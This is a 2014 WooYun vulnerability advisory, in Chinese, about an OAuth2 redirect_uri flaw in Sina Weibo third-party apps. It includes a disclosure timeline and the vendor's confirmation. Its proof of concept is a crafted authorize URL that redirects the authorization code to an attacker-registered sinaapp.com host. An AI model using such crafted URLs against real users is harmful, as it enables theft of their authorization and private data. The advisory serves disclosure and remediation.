[公开漏洞]新浪微博部分App Oauth2漏洞

新浪微博部分App Oauth2漏洞 相关厂商： 新浪 漏洞作者：varas-ra 提交时间：2014-05-16 17:52 公开时间：2014-06-30 17:53 漏洞类型：敏感信息泄露 危害等级：中 自评Rank：5 漏洞状态： 厂商已经确认 漏洞来源：http://www.wooyun.org Tags标签： 无 漏洞详情 披露状态：

2014-05-16：细节已通知厂商并且等待厂商处理中
2014-05-17：厂商已经确认，细节仅向厂商公开
2014-05-27：细节向核心白帽子及相关领域专家公开
2014-06-06：细节向普通白帽子公开
2014-06-16：细节向实习白帽子公开
2014-06-30：细节向公众公开

简要描述：

新浪微博很多应用有数量众多的用户，judge.sinaapp.com和qmatch.sinaapp.com等都是微博中用户量较大的应用，现在仍然存在Oauth2的漏洞，可造成用户隐私泄露等问题。

详细说明：

新浪微博很多应用有数量众多的用户，judge.sinaapp.com和qmatch.sinaapp.com等都是微博中用户量较大的应用，现在仍然存在Oauth2的漏洞，可造成用户隐私泄露等问题。

以judge.sinaapp.com为例

新浪授权页面

https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://judge.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog

可以将该页面judge进行替换，例如

https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://xxxx.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog

最终用户的认证信息就会发送到恶意用户的xxxx.sinaapp.com，xxxx.sinaapp.com可由任意用户注册，qmatch.sinaapp.com与此类似,此外还有大量微博应用存在这个问题。

漏洞证明：

以judge.sinaapp.com为例

新浪授权页面

https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://judge.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog

可以将该页面judge进行替换，例如

https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://xxxx.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog

最终用户的认证信息就会发送到恶意用户的xxxx.sinaapp.com，qmatch.sinaapp.com与此类似，此外还有大量应用存在此问题。

修复方案：

严格认证redirect_uri

版权声明：转载请注明来源 varas-ra@乌云 漏洞回应 厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2014-05-17 20:45

厂商回复：

感谢关注新浪安全，已经通知相应的开发人员进行处理

最新状态：

暂无